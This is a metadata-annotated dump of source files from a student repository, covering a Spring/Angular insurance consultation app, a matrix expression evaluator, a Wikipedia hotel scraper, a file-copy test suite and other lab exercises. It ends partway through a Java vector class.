"alpha_fraction": 0.7754985690116882, "alphanum_fraction": 0.7754985690116882, "avg_line_length": 37.15217208862305, "blob_id": "a82ce1fc90aa4ebab3a7f6f608bc532f5c34a704", "content_id": "4d75027830ee237a944ddd8bbdb23b222463ade2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1755, 
"license_type": "no_license", "max_line_length": 108, "num_lines": 46, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/service/consult/ConsultCollegaue.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.service.consult;\n\nimport com.fasterxml.jackson.databind.ObjectMapper;\nimport com.fasterxml.jackson.databind.ObjectWriter;\nimport io.github.k_gregory.insurance.service.consult.data.ConsultNotification;\nimport org.springframework.web.socket.CloseStatus;\nimport org.springframework.web.socket.TextMessage;\nimport org.springframework.web.socket.WebSocketSession;\nimport org.springframework.web.socket.handler.TextWebSocketHandler;\n\nimport java.io.IOException;\n\npublic abstract class ConsultCollegaue extends TextWebSocketHandler {\n protected WebSocketSession session;\n protected static final ObjectMapper objectMapper = new ObjectMapper();\n private static final ObjectWriter writer = objectMapper.writerWithDefaultPrettyPrinter();\n protected final ConsultMediator mediator;\n\n protected ConsultCollegaue(ConsultMediator mediator) {\n this.mediator = mediator;\n }\n\n public String getId(){\n return session.getId();\n }\n\n @Override\n public final void afterConnectionClosed(WebSocketSession session, CloseStatus status) throws Exception {\n disconnectFromMediator(mediator);\n }\n public abstract void disconnectFromMediator(ConsultMediator mediator);\n\n @Override\n public final void afterConnectionEstablished(WebSocketSession session) throws Exception {\n this.session = session;\n connectToMediator(mediator);\n }\n\n public abstract void connectToMediator(ConsultMediator mediator);\n\n public void sendNotification(ConsultNotification o) throws IOException {\n if(!session.isOpen()) throw new IOException(\"Session already closed\");\n String msg = writer.writeValueAsString(o);\n session.sendMessage(new TextMessage(msg));\n }\n}\n" }, { "alpha_fraction": 0.7366771101951599, "alphanum_fraction": 0.7366771101951599, "avg_line_length": 39.33333206176758, "blob_id": "c8455728c708a91358b98e3c3ed854e810367450", "content_id": "e3dc0d8c429d9d21e37f40626bc32cccc2bc102d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3509, "license_type": "no_license", "max_line_length": 107, "num_lines": 87, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/configuration/SecurityConfig.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.configuration;\n\nimport org.springframework.beans.factory.annotation.Autowired;\nimport org.springframework.beans.factory.annotation.Value;\nimport org.springframework.context.annotation.Bean;\nimport org.springframework.context.annotation.Configuration;\nimport org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder;\nimport org.springframework.security.config.annotation.method.configuration.EnableGlobalMethodSecurity;\nimport org.springframework.security.config.annotation.web.builders.HttpSecurity;\nimport org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;\nimport org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;\nimport org.springframework.security.config.core.GrantedAuthorityDefaults;\nimport org.springframework.security.core.userdetails.UserDetailsService;\nimport org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;\nimport 
org.springframework.security.crypto.password.PasswordEncoder;\nimport org.springframework.security.web.authentication.RememberMeServices;\nimport org.springframework.security.web.authentication.rememberme.JdbcTokenRepositoryImpl;\nimport org.springframework.security.web.authentication.rememberme.PersistentTokenBasedRememberMeServices;\nimport org.springframework.security.web.csrf.CookieCsrfTokenRepository;\n\nimport javax.sql.DataSource;\n\n@Configuration\n@EnableWebSecurity\n@EnableGlobalMethodSecurity(prePostEnabled = true)\npublic class SecurityConfig extends WebSecurityConfigurerAdapter {\n private final UserDetailsService userDetailsService;\n private final DataSource ds;\n @Value(\"${app.remember-me.parameter-name}\")\n private String rememberMeParameter;\n @Value(\"${app.remember-me.key}\")\n private String securityKey;\n\n @Autowired\n public SecurityConfig(UserDetailsService userDetailsService,\n DataSource ds) {\n this.userDetailsService = userDetailsService;\n this.ds = ds;\n }\n\n @Override\n protected void configure(HttpSecurity http) throws Exception {\n http\n .authorizeRequests()\n .antMatchers(\"/register/**\").permitAll()\n .anyRequest().authenticated().and()\n .formLogin()\n .loginPage(\"/login\")\n .permitAll().and()\n .rememberMe()\n .rememberMeParameter(rememberMeParameter)\n .key(securityKey)\n .rememberMeServices(rememberMeServices()).and()\n .csrf()\n .csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse());\n }\n\n @Override\n protected void configure(AuthenticationManagerBuilder auth) throws Exception {\n auth\n .userDetailsService(userDetailsService)\n .passwordEncoder(passwordEncoder());\n }\n\n @Bean\n public PasswordEncoder passwordEncoder() {\n return new BCryptPasswordEncoder();\n }\n\n @Bean\n RememberMeServices rememberMeServices() {\n JdbcTokenRepositoryImpl tokenRepository = new JdbcTokenRepositoryImpl();\n tokenRepository.setDataSource(ds);\n return new PersistentTokenBasedRememberMeServices(\n securityKey,\n userDetailsService,\n tokenRepository\n );\n }\n\n\n @Bean\n public GrantedAuthorityDefaults grantedAuthorityDefaults() {\n return new GrantedAuthorityDefaults(\"\");\n }\n\n}\n" }, { "alpha_fraction": 0.6372372508049011, "alphanum_fraction": 0.6408408284187317, "avg_line_length": 31.299999237060547, "blob_id": "813d4abdfebf6ee39b926b2c4bd776ab5003b7d7", "content_id": "10ca8ac7fb6cd362ca695ffcb6394d870fa49ea3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1665, "license_type": "no_license", "max_line_length": 96, "num_lines": 50, "path": "/otp/src/main/java/io/github/k_gregory/otp/lab2/MatrixEvalutor.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.lab2;\r\n\r\nimport io.github.k_gregory.otp.lab1.ParseException;\r\nimport io.github.k_gregory.otp.lab2.datatypes.MathVal;\r\nimport org.antlr.v4.runtime.ANTLRInputStream;\r\nimport org.antlr.v4.runtime.CommonTokenStream;\r\n\r\nimport java.util.HashMap;\r\nimport java.util.Map;\r\nimport java.util.Scanner;\r\n\r\npublic class MatrixEvalutor {\r\n private final Map<String, MathVal> memory;\r\n\r\n public MatrixEvalutor(Map<String, MathVal> memory) {\r\n this.memory = memory;\r\n }\r\n\r\n public MatrixEvalutor() {\r\n this(new HashMap<>());\r\n }\r\n\r\n public static void main(String... 
args) {\r\n MatrixEvalutor evalutor = new MatrixEvalutor();\r\n Scanner scanner = new Scanner(System.in);\r\n scanner.useDelimiter(\"\\\\R+\");\r\n while (scanner.hasNext()) {\r\n try {\r\n System.out.println(evalutor.evalute(scanner.next()));\r\n } catch (Exception e) {\r\n e.printStackTrace();\r\n }\r\n }\r\n }\r\n\r\n public void clearMemory() {\r\n memory.clear();\r\n }\r\n\r\n public MathVal evalute(String expression) {\r\n ANTLRInputStream inputStream = new ANTLRInputStream(expression);\r\n MatrixLexer lexer = new MatrixLexer(inputStream);\r\n CommonTokenStream tokenStream = new CommonTokenStream(lexer);\r\n MatrixParser parser = new MatrixParser(tokenStream);\r\n CalculatorVisitor visitor = new CalculatorVisitor(memory);\r\n MatrixParser.DefProgContext tree = parser.defProg();\r\n if (parser.getNumberOfSyntaxErrors() != 0) throw new ParseException(\"Bad source code!\");\r\n return visitor.visit(tree);\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6272028684616089, "alphanum_fraction": 0.637144148349762, "avg_line_length": 26.662500381469727, "blob_id": "0387addddd2741f2f06754cd6d4ae2e1573772b7", "content_id": "51de33f68a0f3c6765a10591d822392514e377a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2213, "license_type": "no_license", "max_line_length": 113, "num_lines": 80, "path": "/hotels/tourism/dimport/research.py", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import os\nimport django\n\nfrom bs4 import BeautifulSoup\nimport requests\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"tourism.settings\")\ndjango.setup()\n\nfrom hotels.models import Country, Hotel\n\n\ndef parse_simple(url):\n result = requests.get(url)\n soup = BeautifulSoup(result.content, \"html.parser\")\n paragraphs = soup.find_all(\"p\")\n\n if len(paragraphs) < 2:\n raise RuntimeError(\"No paragraph\")\n\n paragraphs.sort(key=lambda p: -len(p.text))\n\n if not paragraphs[0].text:\n raise RuntimeError(\"Empty paragraph\")\n\n return paragraphs[0].text\n\nbase_url = \"https://en.wikipedia.org\"\n\nresult = requests.get(base_url + \"/wiki/List_of_largest_hotels\")\nsoup = BeautifulSoup(result.content, \"html.parser\")\n\ntables = soup.find_all('table')\ntables.sort(key=lambda t: len(t.find_all('tr')))\ntable = tables[-1]\ntable_rows = table.find_all('tr')[1:]\n\ncountries = {}\ncountry_hotels = {}\n\nfor idx, row in enumerate(table_rows):\n try:\n print((idx, len(table_rows)))\n tds = row.find_all('td')\n name_td = tds[1]\n country_td = tds[2]\n\n hotel_name = name_td.a.string\n country_name = country_td.a.string\n\n if country_name not in countries:\n countries[country_name] = parse_simple(base_url + country_td.a['href'])\n\n if country_name not in country_hotels:\n country_hotels[country_name] = []\n\n country_hotels[country_name].append({\n 'name': hotel_name,\n 'description': parse_simple(base_url + name_td.a['href'])\n })\n except Exception as e:\n print(e)\n print(row)\n\nfinal_hotels = [(country_name, hotel)\n for country_name, hotels in country_hotels.items()\n for hotel in hotels[:15] if len(hotels) > 0]\n\n\nsaved_countries = {}\n\nfor country_name, description in countries.items():\n saved_countries[country_name] = Country.objects.create(name = country_name, description = description[:2000])\n\nfor country_name, hotel in final_hotels:\n Hotel(name=hotel['name'],\n brief_description=hotel['description'][:150],\n description = hotel['description'][:2000],\n country = saved_countries[country_name]\n ).save()\n" }, { 
"alpha_fraction": 0.5916398763656616, "alphanum_fraction": 0.5964630246162415, "avg_line_length": 20.214284896850586, "blob_id": "9ba95cc454aca86cad788bb1f982531872f0d9ed", "content_id": "b4e6fec55f5233d25a6909d5d8d501ba2539c637", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 622, "license_type": "no_license", "max_line_length": 61, "num_lines": 28, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab3/task1/SweetRoll.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab3.task1;\r\n\r\npublic class SweetRoll implements Gift {\r\n private String taste;\r\n\r\n public SweetRoll(String taste) {\r\n this.taste = taste;\r\n }\r\n\r\n @Override\r\n public String toString() {\r\n return \"sweet roll with \" + taste;\r\n }\r\n\r\n public void checkTaste() {\r\n System.out.println(toString() + \" tastes delicious\");\r\n }\r\n\r\n @Override\r\n public Gift clone() throws CloneNotSupportedException {\r\n return (SweetRoll) super.clone();\r\n }\r\n\r\n @Override\r\n public void accept(GiftVisitor v) {\r\n v.visit(this);\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6740157604217529, "alphanum_fraction": 0.6740157604217529, "avg_line_length": 24.399999618530273, "blob_id": "c58b4d7a477a343d493eb5bfa82f25d1298f90cc", "content_id": "0243e1828242b939d7b11511a09d5bed57180379", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 635, "license_type": "no_license", "max_line_length": 73, "num_lines": 25, "path": "/numerical-methods/src/app/romberg/romberg.component.spec.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import { async, ComponentFixture, TestBed } from '@angular/core/testing';\n\nimport { RombergComponent } from './romberg.component';\n\ndescribe('RombergComponent', () => {\n let component: RombergComponent;\n let fixture: ComponentFixture<RombergComponent>;\n\n beforeEach(async(() => {\n TestBed.configureTestingModule({\n declarations: [ RombergComponent ]\n })\n .compileComponents();\n }));\n\n beforeEach(() => {\n fixture = TestBed.createComponent(RombergComponent);\n component = fixture.componentInstance;\n fixture.detectChanges();\n });\n\n it('should create', () => {\n expect(component).toBeTruthy();\n });\n});\n" }, { "alpha_fraction": 0.5015015006065369, "alphanum_fraction": 0.5105105042457581, "avg_line_length": 17.5, "blob_id": "9859515d83dd2d9cb41207e46cac47ccac2e80c8", "content_id": "f4cc9e049e407c2fd3f6de5571b0fd294e92db07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 333, "license_type": "no_license", "max_line_length": 103, "num_lines": 18, "path": "/numerical-methods/src/app/trapetion.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "export function trapetion_simple(f: (number) => number, low: number, high: number, h: number): number {\n let n = Math.ceil((high - low) / h);\n h = (high - low) / n;\n\n console.log(n);\n\n let res = 0;\n\n res += (f(low) + f(high)) / 2;\n\n for(let i = 1; i < n; i++){\n res += f(low + i * h);\n }\n\n res = res * h;\n\n return res;\n}\n" }, { "alpha_fraction": 0.7616279125213623, "alphanum_fraction": 0.7616279125213623, "avg_line_length": 32.44444274902344, "blob_id": "a3cf2bdca7771a4bafc6d432ed0be718a7d15e34", "content_id": "8cafe2fa51548b1ea181d9b2c6640b0980f50486", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", 
"length_bytes": 1204, "license_type": "no_license", "max_line_length": 107, "num_lines": 36, "path": "/insurance/frontend/src/app/app.module.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import { BrowserModule } from '@angular/platform-browser';\nimport { NgModule } from '@angular/core';\nimport {RouterModule, Routes} from '@angular/router'\nimport {FormsModule} from \"@angular/forms\"\n\nimport { AppComponent } from './app.component';\nimport { SupporterConsultationComponent } from './supporter-consultation/supporter-consultation.component';\nimport { ClientConsultationComponent } from './client-consultation/client-consultation.component';\nimport {ClientConsultationService} from './client-consultation.service';\nimport {SupporterConsultationService} from './supporter-consultation.service';\nimport { MessagesComponent } from './messages/messages.component';\n\nconst appRoutes: Routes = [\n {path: \"client\", component: ClientConsultationComponent},\n {path: \"support\", component: SupporterConsultationComponent}\n];\n\n@NgModule({\n declarations: [\n AppComponent,\n SupporterConsultationComponent,\n ClientConsultationComponent,\n MessagesComponent\n ],\n imports: [\n FormsModule,\n BrowserModule,\n RouterModule.forRoot(appRoutes)\n ],\n providers: [\n ClientConsultationService,\n SupporterConsultationService\n ],\n bootstrap: [AppComponent]\n})\nexport class AppModule { }\n" }, { "alpha_fraction": 0.6031623482704163, "alphanum_fraction": 0.609332799911499, "avg_line_length": 33.1184196472168, "blob_id": "c8262da7bad71c77655e56384beac50df7ca0be1", "content_id": "bc5cd649b47f937d2cca62c24b558dbba38a8452", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5186, "license_type": "no_license", "max_line_length": 80, "num_lines": 152, "path": "/system_programming/lab1/task1/test.py", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import unittest\nimport subprocess as sp\nimport os\nfrom stat import ST_MODE, ST_ATIME, ST_MTIME, ST_CTIME, ST_SIZE\nfrom pathlib import Path\n\ndef overwrite(filename, content):\n with open(filename, 'w') as f:\n f.write(content)\n\ndef simple_read(filename):\n with open(filename, 'r') as f:\n return f.read()\n\ndef call_prog(*args):\n def decode_out(output):\n return output.decode('utf-8').strip()\n\n proc = sp.Popen(['./build/main', *args], stdout=sp.PIPE, stderr=sp.PIPE)\n (stdout, stderr) = proc.communicate(timeout=10)\n (stdout, stderr) = (decode_out(stdout), decode_out(stderr))\n\n returncode = proc.returncode\n return (returncode, stdout, stderr)\n\nclass TestFileCopying(unittest.TestCase):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.in_filename = '/tmp/will-be-overwritten'\n self.out_filename = '/tmp/will-be-removed'\n self.same_filename = '/tmp/will-be-overwritten2'\n self.link_src = 'will-be-overwritten2' #depends on same_filename\n self.nonexist_filename = '/does/not/exist'\n self.link_filename = '/tmp/link-overwritten'\n\n assert not os.path.exists(self.nonexist_filename)\n\n\n def setUp(self):\n for f in [self.in_filename, \n self.out_filename, \n self.same_filename,\n self.link_filename]:\n try:\n os.remove(f)\n except FileNotFoundError:\n pass\n\n\n def test_args_count(self):\n for args in [(), \n (self.in_filename,), \n (self.in_filename, self.out_filename, self.same_filename)]:\n with self.subTest(args=args):\n (code, out, err) = call_prog(*args)\n self.assertEqual(code, 1)\n self.assertEqual(out, '')\n 
self.assertIn('Usage', err)\n\n    def test_nonexistent_input_files_fail(self):\n        (code, out, err) = call_prog('/does/not/exist', self.out_filename)\n        self.assertEqual(code, 1)\n        self.assertEqual(out, '')\n        self.assertIn('No such file', err)\n\n    def test_existent_file_not_removed(self):\n        overwrite(self.in_filename, 'dummy')\n        overwrite(self.out_filename, 'other dummy')\n        os.chmod(self.out_filename, 0o220)\n\n        pre_run_stat = list(os.stat(self.out_filename))\n        (code, out, err) = call_prog(self.in_filename, self.out_filename)\n        post_run_stat = list(os.stat(self.out_filename))\n        for key in [ST_ATIME, ST_CTIME, ST_MTIME, ST_SIZE]:\n            post_run_stat[key] = pre_run_stat[key]\n\n        self.assertEqual(pre_run_stat, post_run_stat)\n        self.assertEqual(code, 0)\n        self.assertEqual(err, '')\n        self.assertIn('Wrote', out)\n\n\n    def test_file_created(self):\n        overwrite(self.in_filename, 'dummy')\n        (return_code, out, err) = call_prog(self.in_filename, self.out_filename)\n        file_exists = Path(self.out_filename).is_file()\n        file_mode = os.stat(self.out_filename)[ST_MODE]\n\n        self.assertEqual(return_code, 0)\n        self.assertTrue(file_exists)\n        self.assertEqual(file_mode, 0o100644)\n        self.assertEqual(err, '')\n        self.assertIn('Wrote', out)\n\n    def test_src_dest_name_must_differ(self):\n        overwrite(self.same_filename, 'some text')\n\n        (code, out, err) = call_prog(self.same_filename, self.same_filename)\n\n        self.assertEqual(code, 1)\n        self.assertEqual(out, '')\n        self.assertIn('different files', err)\n\n    def test_symlinks_must_differ(self):\n        overwrite(self.same_filename, 'some dummy')\n        os.symlink(self.link_src, self.link_filename)\n\n        (code, out, err) = call_prog(self.same_filename, self.link_filename)\n\n        self.assertEqual(code, 1)\n        self.assertEqual(out, '')\n        self.assertIn('different files', err)\n\n    def test_hardlinks_must_differ(self):\n        overwrite(self.same_filename, 'some dummy')\n        os.link(self.same_filename, self.link_filename)\n\n        (code, out, err) = call_prog(self.same_filename, self.link_filename)\n\n        self.assertEqual(code, 1)\n        self.assertEqual(out, '')\n        self.assertIn('different files', err)\n\n    def assertRunWithText(self, text):\n        overwrite(self.in_filename, text)\n\n        (code, out, err) = call_prog(self.in_filename, self.out_filename)\n        res_content = simple_read(self.out_filename)\n\n        self.assertEqual(code, 0)\n        self.assertEqual(err, '')\n        self.assertIn('Wrote', out)\n        self.assertIn(str(len(text)), out)\n        self.assertEqual(text.lower(), res_content)\n\n    def test_overwrites_existing_content(self):\n        overwrite(self.out_filename, 'This will not be written after test')\n        self.assertRunWithText('Will be in file')\n\n    def test_content_written(self):\n        content = 'QWerTYU\\tiOpjk\\ndASdFGhKLXCvbnrTYI\\0sdEWRdfDRwErVRwerFSrre\\n'\n        content = content * 20\n\n        assert len(content) > 1024\n\n        for i in range(0, len(content)):\n            text = content[:i]\n            with self.subTest(content=text):\n                self.assertRunWithText(text)\n\nif __name__ == '__main__':\n    unittest.main()\n" }, { "alpha_fraction": 0.7070063948631287, "alphanum_fraction": 0.7197452187538147, "avg_line_length": 20.454545974731445, "blob_id": "45ec0593888d7fd4c3e0cd614a0baaf0681d775d", "content_id": "d4d95ad9bd28ee4b0290c4b218259ff414264b76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 471, "license_type": "no_license", "max_line_length": 39, "num_lines": 22, "path": "/insurance/backend/src/main/resources/db/migration/V1__create_principal_tables.sql", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "CREATE 
TABLE \"user\"(\n login TEXT PRIMARY KEY NOT NULL,\n password_hash TEXT NOT NULL\n);\n\nCREATE TABLE role(\n role_name TEXT PRIMARY KEY NOT NULL\n);\n\nCREATE TABLE user_roles(\n login TEXT REFERENCES \"user\"(login),\n role TEXT REFERENCES role(role_name),\n PRIMARY KEY (login, role)\n);\n\nCREATE TABLE persistent_logins (\n username varchar(64) not null,\n series varchar(64) not null,\n token varchar(64) not null,\n last_used timestamp not null,\n PRIMARY KEY (series)\n);" }, { "alpha_fraction": 0.7471747994422913, "alphanum_fraction": 0.7471747994422913, "avg_line_length": 30.44628143310547, "blob_id": "c8e40bc24f2c05ee0977a8534aa799c295d094f9", "content_id": "1518567fdca47401a3a96d8aeafda162279ae0de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 3805, "license_type": "no_license", "max_line_length": 134, "num_lines": 121, "path": "/insurance/frontend/src/app/supporter-consultation.service.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import {Injectable} from '@angular/core';\nimport {webSocketUrl} from '../util/urls';\nimport {BufferSendableState, ConnectionContext, WebSocketSendableState} from '../websocket/ConnectionContext';\nimport {Observable} from '@reactivex/rxjs';\nimport {\n AnswerClientRequest,\n AssignClientRequest,\n ClientAssignedNotification,\n ClientDisconnectNotification, FreeClientListNotification, FreeClientListRequest, ListClientMessagesRequest, MessageListNotification,\n NewAnswerNotification, NewClientNotification, NewQuestionNotification, SupportMessage, UnassignClientRequest, WsNotification,\n WsNotificationVisitor\n} from '../consultation/ConsultationMessage';\nimport {JsonMessageFactory} from '../consultation/MessageFactory';\nimport {isUndefined} from 'util';\n\nexport class ClientInfo{\n\n constructor(id: string) {\n this.id = id;\n }\n\n id: string;\n messages: SupportMessage[] = [];\n hasNewMessages: boolean = false;\n assigned: boolean = false;\n assignedToMe : boolean = false;\n}\n\nclass SupporterVisitor implements WsNotificationVisitor{\n visitMessageListNotification(c: MessageListNotification) {\n this.s.clients[c.clientId].messages = c.messages;\n }\n\n constructor(private s: SupporterConsultationService){}\n\n visitNewQuestionNotification(c: NewQuestionNotification) {\n this.s.clients[c.clientId].messages.push(c.message);\n this.s.clients[c.clientId].hasNewMessages = true;\n }\n\n visitNewClientNotification(c: NewClientNotification) {\n this.s.clients[c.clientId] = new ClientInfo(c.clientId);\n }\n\n visitNewAnswerNotification(c: NewAnswerNotification) {\n throw new Error('Can\\'t receive answers');\n }\n\n visitClientDisconnectNotification(c: ClientDisconnectNotification) {\n delete this.s.clients[c.clientId];\n }\n\n visitFreeClientListNotification(c: FreeClientListNotification) {\n c.clients.forEach(freeClientId=>{\n if(!isUndefined(this.s.clients[freeClientId])) {\n this.s.clients[freeClientId].assigned = false;\n this.s.clients[freeClientId].assignedToMe = false;\n } else this.s.clients[freeClientId] = new ClientInfo(freeClientId);\n })\n }\n\n visitClientAssignedNotification(c: ClientAssignedNotification) {\n this.s.clients[c.clientId].assigned = true;\n this.s.clients[c.clientId].assignedToMe = c.toRecv;\n }\n\n}\n\n@Injectable()\nexport class SupporterConsultationService {\n\n\n private wsUrl = webSocketUrl('/ws/consult/support');\n private wsCtx = new ConnectionContext();\n wsObservable: Observable<WsNotification>;\n clients: { [id: string]: ClientInfo} = 
{};\n selectedClient: string;\n\n private visitor = new SupporterVisitor(this);\n\n constructor() {\n this.wsCtx.setState(new BufferSendableState());\n\n const messageFactory = new JsonMessageFactory();\n\n const ws = new WebSocket(this.wsUrl);\n ws.onopen = ev=>this.wsCtx.setState(new WebSocketSendableState(ws));\n\n this.wsObservable = Observable.create(observer=>{\n ws.onmessage = ev=>observer.next(ev.data);\n }).map(msg=> messageFactory.create(msg));\n\n this.wsObservable.subscribe(n=>n.accept(this.visitor));\n }\n\n refreshFree(){\n this.wsCtx.write(new FreeClientListRequest);\n }\n\n selectClient(clientId: string){\n this.selectedClient = clientId;\n this.wsCtx.write(new ListClientMessagesRequest(clientId))\n }\n\n assignClient(clientId: string){\n this.selectedClient = clientId;\n this.wsCtx.write(new AssignClientRequest(clientId))\n }\n\n unassignClient(clientId: string){\n this.selectedClient = undefined;\n this.wsCtx.write(new UnassignClientRequest(clientId))\n }\n\n writeAnswer(message: string){\n const clientId = this.selectedClient;\n const supportMessage = new SupportMessage(message, true);\n this.clients[clientId].messages.push(supportMessage);\n this.wsCtx.write(new AnswerClientRequest(clientId, message));\n }\n}\n" }, { "alpha_fraction": 0.6774193644523621, "alphanum_fraction": 0.6774193644523621, "avg_line_length": 27, "blob_id": "41556cf526c46200e185f06e028277391a3715de", "content_id": "d15d9e28ea2ee50ec5b968c08aaa1426144b43a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 31, "license_type": "no_license", "max_line_length": 27, "num_lines": 1, "path": "/despat/settings.gradle", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "rootProject.name = 'despat'\r\n\r\n" }, { "alpha_fraction": 0.7039999961853027, "alphanum_fraction": 0.7279999852180481, "avg_line_length": 18.83333396911621, "blob_id": "b037be5b9ca72aefd71cbe37621ba5a3f48583e2", "content_id": "cd9412d171ab4abc4e48a09809234fb7506d17ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 125, "license_type": "no_license", "max_line_length": 49, "num_lines": 6, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab2/task2/PaymentMethod.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab2.task2;\r\n\r\n//Adaptor\r\npublic interface PaymentMethod {\r\n boolean tryPass();\r\n}\r\n" }, { "alpha_fraction": 0.450945109128952, "alphanum_fraction": 0.45214521884918213, "avg_line_length": 25.0390625, "blob_id": "d5f447aea101b4108aca7fbfcbbe3996bc03bfbc", "content_id": "1cd77c644d0fa0007d0de5879175e7b4dfb044cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3333, "license_type": "no_license", "max_line_length": 62, "num_lines": 128, "path": "/db/lab1/app.py", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "from lab1.sport import SportDB\nfrom pickle import load, dump\n\nclass ExitEx(Exception):\n pass\n\ndef exitF():\n raise ExitEx()\n\ndef ask(p):\n return input(p).strip()\n\nclass Program:\n def add_team(self):\n self.db.team.add(\n name = ask(\"Team name: \"),\n origin = ask(\"Team origin: \"),\n sport = ask(\"Team sport: \")\n )\n\n def del_team(self):\n name = ask(\"Team name: \")\n self.db.team.delete(self.db.team.find(name=name))\n\n def del_player(self):\n id = ask(\"Player ID: \")\n self.db.player.delete(self.db.player.find(id=int(id)))\n\n def 
add_player(self):\n        self.db.player.add(\n            name = ask(\"Player name: \"),\n            team_name = ask(\"Player team: \"),\n            score = 0\n        )\n    def mod_player(self):\n        id = int(ask(\"Player id: \"))\n        players = self.db.player.find(id=id)\n        if not players:\n            raise ValueError(\"Player not found\")\n        else:\n            player = players[0]\n\n        rewrite = {}\n        for k,v in player.items():\n            upd = ask(\"{}, default: '{}': \".format(k, v))\n            if upd == \"\":\n                rewrite[k] = v\n            else:\n                rewrite[k] = upd\n\n        self.db.player.update(players, **rewrite)\n\n    def mod_team(self):\n        name = ask(\"Team name: \")\n        teams = self.db.team.find(name=name)\n        if not teams:\n            raise ValueError(\"Team not found\")\n        else:\n            team = teams[0]\n\n        rewrite = {}\n        for k,v in team.items():\n            upd = ask(\"{}, default: {}: \".format(k, v))\n            if upd == \"\":\n                rewrite[k] = v\n            else:\n                rewrite[k] = upd\n\n        self.db.team.update(teams, **rewrite)\n\n    def exit(self):\n        raise ExitEx()\n\n    def print_help(self):\n        print(list(self.commands.keys()))\n\n    def print_best(self):\n        print(self.db.best())\n\n    def print_players(self):\n        print(self.db.player.find())\n\n    def print_teams(self):\n        print(self.db.team.find())\n\n    def load(self):\n        with open(\"db.pk\", \"rb\") as f:\n            self.db = load(f)\n\n    def save(self):\n        with open(\"db.pk\", \"wb\") as f:\n            dump(self.db, f)\n\n\n    def __init__(self):\n        self.db = SportDB()\n        self.commands = {\n            \"exit\": self.exit,\n            \"help\": self.print_help,\n            \"load\": self.load,\n            \"save\": self.save,\n            \"add team\": self.add_team,\n            \"del team\": self.del_team,\n            \"mod team\": self.mod_team,\n            \"add player\": self.add_player,\n            \"del player\": self.del_player,\n            \"mod player\": self.mod_player,\n            \"best\": self.print_best,\n            \"teams\": self.print_teams,\n            \"players\": self.print_players\n        }\n\n\n    def run(self):\n        try:\n            while True:\n                cmd = input(\">> \").strip()\n                try:\n                    if cmd in self.commands:\n                        self.commands[cmd]() \n                    else:\n                        print(\"Command not found\")\n                except ValueError as e:\n                    print(e)\n        except ExitEx:\n            pass\n\nProgram().run()\n" }, { "alpha_fraction": 0.5249484777450562, "alphanum_fraction": 0.53030925989151, "avg_line_length": 30.33333396911621, "blob_id": "aeb395f31a1bbf8caef5a3a15b12acafcfd6ee8f", "content_id": "e6f405572e4def2f6c257e5b2cb0a43779724a3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4850, "license_type": "no_license", "max_line_length": 103, "num_lines": 150, "path": "/otp/src/main/java/io/github/k_gregory/otp/lab2/datatypes/VectorVal.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.lab2.datatypes;\r\n\r\nimport Jama.Matrix;\r\nimport io.github.k_gregory.otp.lab2.MathValVisitor;\r\n\r\nimport java.util.Arrays;\r\nimport java.util.stream.Collectors;\r\n\r\nimport static java.util.Arrays.stream;\r\n\r\npublic class VectorVal extends MathVal {\r\n    private MathVal[] elements;\r\n\r\n    public VectorVal(MathVal... 
